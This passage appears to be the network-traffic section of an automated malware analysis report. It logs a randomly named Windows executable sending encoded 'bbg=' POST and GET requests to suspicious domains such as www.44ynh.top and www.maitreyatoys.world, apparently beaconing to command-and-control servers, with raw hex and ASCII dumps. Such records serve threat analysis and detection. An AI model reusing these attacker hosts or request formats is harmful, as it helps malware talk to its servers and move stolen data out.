64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.550017194.245.148.189804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:16.487102985 CET815OUTPOST /ib68/ HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.maitreyatoys.world
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.maitreyatoys.world/ib68/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 6e 44 30 52 39 4b 4a 73 72 58 6a 35 4b 63 58 35 43 33 63 34 6f 73 62 53 52 33 79 45 2f 54 32 4c 66 62 53 52 75 47 48 53 38 72 6e 4a 36 49 4f 6a 45 51 49 4f 68 74 45 69 6b 74 2f 51 70 4f 59 42 42 6f 2b 43 6c 55 4f 4e 37 31 79 6e 76 59 41 47 4d 6b 65 6c 65 6c 2f 36 51 76 62 32 76 59 4e 65 6e 2b 6a 54 39 4a 6a 78 56 46 66 7a 62 79 69 34 77 66 55 4a 77 41 74 68 46 50 54 32 71 4c 4a 4b 4d 36 67 64 71 47 39 44 59 7a 77 38 47 5a 70 61 62 57 77 73 44 73 4d 45 37 56 38 2f 35 61 48 30 2f 38 37 51 52 61 6e 45 6b 59 7a 46 44 75 53 64 52 68 62 4f 47 30 67 38 53 64 31 48 6a 43 75 53 46 79 50 50 42 6f 6f 63 49 32 51 43 53 67 5a 71 36 53 59 69 55 41 47 4b 79 47 38 38
                                                                                      Data Ascii: bbg=nD0R9KJsrXj5KcX5C3c4osbSR3yE/T2LfbSRuGHS8rnJ6IOjEQIOhtEikt/QpOYBBo+ClUON71ynvYAGMkelel/6Qvb2vYNen+jT9JjxVFfzbyi4wfUJwAthFPT2qLJKM6gdqG9DYzw8GZpabWwsDsME7V8/5aH0/87QRanEkYzFDuSdRhbOG0g8Sd1HjCuSFyPPBoocI2QCSgZq6SYiUAGKyG88
                                                                                      Jan 10, 2025 19:53:17.093926907 CET725INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:17 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.550018194.245.148.189804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:19.032689095 CET1832OUTPOST /ib68/ HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.maitreyatoys.world
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.maitreyatoys.world/ib68/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 6e 44 30 52 39 4b 4a 73 72 58 6a 35 4b 63 58 35 43 33 63 34 6f 73 62 53 52 33 79 45 2f 54 32 4c 66 62 53 52 75 47 48 53 38 72 76 4a 35 37 57 6a 45 33 55 4f 6e 64 45 69 74 4e 2f 54 70 4f 59 59 42 75 58 4c 6c 55 43 7a 37 33 36 6e 75 2b 38 47 62 6d 32 6c 52 6c 2f 36 63 50 62 33 78 6f 4e 50 6e 2b 54 58 39 49 50 78 56 46 66 7a 62 78 71 34 35 75 55 4a 79 41 74 69 56 2f 54 45 37 37 4a 75 4d 36 34 72 71 47 49 2b 66 44 51 38 66 35 35 61 58 41 6b 73 42 4d 4d 47 75 56 38 33 35 61 4c 64 2f 38 58 79 52 5a 37 36 6b 62 54 46 50 4a 2f 70 41 68 66 49 46 32 41 39 55 74 46 52 6a 57 72 33 45 6a 76 69 4e 6f 49 66 45 55 30 42 56 55 74 4a 73 7a 6c 4a 47 68 65 62 7a 32 70 72 52 39 2b 6b 2f 48 55 55 67 49 4b 58 7a 70 6b 52 73 54 59 78 56 48 77 2f 4c 2f 6a 63 65 4b 47 31 6e 38 4a 4c 73 59 62 4f 75 47 35 70 72 70 6b 72 6a 32 62 48 72 75 35 57 64 37 6a 45 6e 6d 77 45 50 7a 61 79 70 2f 6f 39 34 43 47 75 49 43 4d 66 5a 36 51 4f 69 6f 4e 50 35 4c 49 45 51 55 4a 36 59 74 4d 73 55 33 69 62 45 66 56 56 38 72 6e 58 6a 6a [TRUNCATED]
                                                                                      Data Ascii: bbg=nD0R9KJsrXj5KcX5C3c4osbSR3yE/T2LfbSRuGHS8rvJ57WjE3UOndEitN/TpOYYBuXLlUCz736nu+8Gbm2lRl/6cPb3xoNPn+TX9IPxVFfzbxq45uUJyAtiV/TE77JuM64rqGI+fDQ8f55aXAksBMMGuV835aLd/8XyRZ76kbTFPJ/pAhfIF2A9UtFRjWr3EjviNoIfEU0BVUtJszlJGhebz2prR9+k/HUUgIKXzpkRsTYxVHw/L/jceKG1n8JLsYbOuG5prpkrj2bHru5Wd7jEnmwEPzayp/o94CGuICMfZ6QOioNP5LIEQUJ6YtMsU3ibEfVV8rnXjj231RZM613m+aZeeUGMtBsdrPv1t6bvymNPw3OhYLKhchpGBJH/vwbX0wHt7Sp7Lssr/AVXY2MgO4FD9uOQszQKke2anGk0pLH+vubdlwe5QvRNtcGB/KuiA4xZ6L74f93KCUjn5AuvcXfsgO/pbfSGEx1T80hpN/P/S+t9OixmJX6giRc30DyKtWtGD7vGYoIPTlBuw/uWIo0CykWuow1DVSuyVv5mNfURQiv1ExwP51RqQsbmBk0t8ybP7tbAzP0gH6ljdTKnIwx6quiMdx+HY7fyFiAPrRoBFghVoBePez86sLB53K6MRN2yvMRNJ7RVqI3ma4bFzOq9p5OeviQan8j7xTTF+g0ZPufV6SZfw5Q+v2VwvWRg07EFUEOsHxN8dXRItq98uiZ6DLLTH8t7uzfK1uzoJA39Zl1XBKq5IzdllKmaBAfPqzJfiQrXQYolBskp1j+JJyGs47bkUGdMM+JzQxDRKUMMeR8rikbdxnkVRK2ahPV7pHPgodieEGb1DO/SUaQ6ZZzzq4dXbL65yFXKE8Jdsj044pPhyeVrxfpZboaAepxWxU5mcL7DUkE8EbetNbFjbnQWVHszDhk8r+I0XXfct5HnwrC28gpadx2T2CORgrDNPqFgCTCslc89kVLFjHmg3S5rqM2YbmHSdCXFAi3UPSVl [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:19.753648996 CET725INHTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:19 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.550019194.245.148.189804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:21.575167894 CET529OUTGET /ib68/?bbg=qBcx+6F+oW3FLMWCFGkku82ue0n+3hqnVOqcrGj635TZ+b/5EUsj5Zs7kPmyn50XK/Tp7ki26yO6xrdZPEzCUCLwZvbCuKVw+bGKkpnxeC2/cgva9NQSwRBKH/jO8oEkZw==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.maitreyatoys.world
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:53:22.225976944 CET242INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:22 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Content-Length: 1840
                                                                                      Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                                      Connection: close
                                                                                      ETag: "58e3a61e-730"
                                                                                      Accept-Ranges: bytes
                                                                                      Jan 10, 2025 19:53:22.226716995 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
                                                                                      Jan 10, 2025 19:53:22.226730108 CET604INData Raw: 7a 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 67 20 62 74 6e 2d 73 75 63 63 65 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 6b 65 72 2e 63 6f 6d 2f 3f
                                                                                      Data Ascii: zation.</p> <p><a class="btn btn-lg btn-success" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>&copy; 2017 CSL GmbH / JOKER.COM</p>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.55002038.181.21.178804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:27.631556034 CET768OUTPOST /tw1g/ HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.44ynh.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.44ynh.top/tw1g/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 53 56 66 30 4e 47 72 4c 67 33 4c 59 66 69 57 59 6a 39 50 57 69 36 35 54 69 65 65 73 67 77 4d 76 65 68 34 45 47 48 69 4e 2b 53 78 6a 4b 4d 4a 79 41 50 69 4f 78 34 37 72 51 36 74 50 34 4d 61 65 37 2b 6b 68 7a 69 32 72 74 74 71 74 48 51 7a 4c 4a 69 61 4b 43 57 4c 4d 6f 32 58 79 78 53 52 70 6c 32 35 6e 53 2b 45 32 6b 55 44 46 69 5a 76 6f 67 47 6a 65 47 35 70 4e 34 37 4c 6e 61 4c 7a 5a 39 35 72 52 77 30 75 4e 54 6c 30 53 58 4c 52 6c 72 37 30 49 46 36 35 49 5a 59 69 6a 67 72 65 32 32 57 31 56 33 36 58 5a 4a 78 4d 66 4a 45 57 41 32 6a 57 44 61 71 4c 2f 30 68 34 2f 66 41 51 36 6a 6d 4a 63 46 30 67 3d
                                                                                      Data Ascii: bbg=SVf0NGrLg3LYfiWYj9PWi65TieesgwMveh4EGHiN+SxjKMJyAPiOx47rQ6tP4Mae7+khzi2rttqtHQzLJiaKCWLMo2XyxSRpl25nS+E2kUDFiZvogGjeG5pN47LnaLzZ95rRw0uNTl0SXLRlr70IF65IZYijgre22W1V36XZJxMfJEWA2jWDaqL/0h4/fAQ6jmJcF0g=
                                                                                      Jan 10, 2025 19:53:28.544368982 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:28 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.55002138.181.21.178804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:30.191828966 CET788OUTPOST /tw1g/ HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.44ynh.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.44ynh.top/tw1g/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 53 56 66 30 4e 47 72 4c 67 33 4c 59 65 43 6d 59 69 65 33 57 67 61 35 51 73 2b 65 73 31 67 4d 72 65 68 38 45 47 47 6e 4b 2b 41 56 6a 4c 70 4e 79 42 4f 69 4f 32 34 37 72 45 71 74 4b 6c 63 62 51 37 2b 6f 70 7a 6a 4b 72 74 70 36 74 48 51 6a 4c 4a 51 79 4a 54 57 4c 4b 39 6d 58 77 31 53 52 70 6c 32 35 6e 53 2b 42 68 6b 51 76 46 6a 6f 66 6f 67 6a 58 64 46 35 70 4b 78 62 4c 6e 65 4c 7a 56 39 35 72 2f 77 78 4f 72 54 67 6f 53 58 4f 74 6c 72 4f 41 48 4b 36 35 4f 58 34 6a 31 70 72 76 43 37 47 4a 73 39 59 4f 4b 51 51 51 59 49 79 6e 71 73 42 65 72 4a 4b 6e 48 6b 79 77 49 4f 77 78 54 35 46 5a 73 62 6a 31 32 2f 69 32 42 69 62 66 57 52 55 70 68 55 74 37 42 53 67 75 75
                                                                                      Data Ascii: bbg=SVf0NGrLg3LYeCmYie3Wga5Qs+es1gMreh8EGGnK+AVjLpNyBOiO247rEqtKlcbQ7+opzjKrtp6tHQjLJQyJTWLK9mXw1SRpl25nS+BhkQvFjofogjXdF5pKxbLneLzV95r/wxOrTgoSXOtlrOAHK65OX4j1prvC7GJs9YOKQQQYIynqsBerJKnHkywIOwxT5FZsbj12/i2BibfWRUphUt7BSguu
                                                                                      Jan 10, 2025 19:53:31.085824013 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.55002238.181.21.178804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:32.743423939 CET1805OUTPOST /tw1g/ HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.44ynh.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.44ynh.top/tw1g/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 53 56 66 30 4e 47 72 4c 67 33 4c 59 65 43 6d 59 69 65 33 57 67 61 35 51 73 2b 65 73 31 67 4d 72 65 68 38 45 47 47 6e 4b 2b 41 64 6a 4c 62 46 79 41 74 4b 4f 33 34 37 72 48 71 74 4c 6c 63 61 4d 37 2f 41 58 7a 6a 48 55 74 76 6d 74 47 32 76 4c 42 45 6d 4a 4b 47 4c 4b 6c 57 58 7a 78 53 52 5a 6c 32 49 75 53 2b 52 68 6b 51 76 46 6a 72 48 6f 6e 32 6a 64 49 5a 70 4e 34 37 4c 6a 61 4c 7a 78 39 35 7a 4a 77 78 43 64 53 54 77 53 4f 75 64 6c 70 59 73 48 48 36 35 4d 55 34 6a 39 70 72 6a 64 37 46 73 56 39 5a 72 52 51 58 38 59 46 48 61 39 35 56 75 77 55 63 44 41 6f 78 6f 61 5a 6c 56 32 36 53 31 33 51 51 42 56 39 6d 75 42 30 76 6d 4f 62 55 39 78 46 63 47 4f 53 58 72 77 65 6e 72 4c 33 77 64 5a 47 32 4f 6f 64 61 75 30 50 6c 72 53 78 79 45 4d 42 63 55 4e 32 54 6d 47 32 4e 58 65 77 48 59 65 44 62 44 67 69 63 45 43 49 4f 43 79 52 61 49 46 74 45 32 49 6b 33 4a 76 52 32 71 43 33 69 63 70 51 30 2b 39 58 38 4f 6f 7a 49 70 34 51 4c 53 35 65 41 63 50 37 69 64 79 62 4b 2f 4f 65 39 34 51 53 56 32 71 78 57 58 72 48 39 [TRUNCATED]
                                                                                      Data Ascii: bbg=SVf0NGrLg3LYeCmYie3Wga5Qs+es1gMreh8EGGnK+AdjLbFyAtKO347rHqtLlcaM7/AXzjHUtvmtG2vLBEmJKGLKlWXzxSRZl2IuS+RhkQvFjrHon2jdIZpN47LjaLzx95zJwxCdSTwSOudlpYsHH65MU4j9prjd7FsV9ZrRQX8YFHa95VuwUcDAoxoaZlV26S13QQBV9muB0vmObU9xFcGOSXrwenrL3wdZG2Oodau0PlrSxyEMBcUN2TmG2NXewHYeDbDgicECIOCyRaIFtE2Ik3JvR2qC3icpQ0+9X8OozIp4QLS5eAcP7idybK/Oe94QSV2qxWXrH9sN4Cl5rAw5gvFSFxehznqI5Tq0crPU2MxQ+MQJ5KsenwGds1jIYZxN1PpkJ7BXuk0b3AL7Kby32BbsKLNca8CBQjbmT98bQOWy/+YHFBaZjZ4E3ouUITOAT5QGIp8zW5KbOqQU3CogcL+TP30jD89rF8adET3woSJK+A3lVgNflz882tuxb7Why6jk7POAdZpss/RGzH+CAINlogXfc0IvM/MeejNql/W2SHzqCS9Gjk72tJk6nGPtBDsGvBYp1xyC9nRY2ashsi/BEfYYbSVa4BwPRLIm0FgGjd5QqLdpWPDcrQhPPATgP9auV+LAWcgpnUu5CJundQSjkiei+SSnSLTGDOp7c+gdR64G90qtd8GhnT1gYW1kwbSc0wKnv5CJrlHjj0kVESlaGMTpgUtDp+tUQ853fTapXujGRfWNhHbT0/C70qhVZMToW+9H1jQz4X+abUAoa/VHpU6jnGRe9rIH9AaTL6ejExJh6WvIveyqHZ6hYzG+L39vaII2OFsm9NwTdeqfU5PdGBKmaMWmUPDAcQL1JVu+n/dP8N+2UnTmw2K4PZzZLkxXR45ox34phFFvKkg4jJA/7gqwDHBO8BuR3fwkBnVpi+k2h2AXzJtj7PD0nrtp30qKdH4lCBEpJj/iE2LCc4E+lwxspbyalzgCPNllYcvz [TRUNCATED]
                                                                                      Jan 10, 2025 19:53:33.664808035 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:33 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66df0ead-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.55002338.181.21.178804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:53:35.292706013 CET520OUTGET /tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.44ynh.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
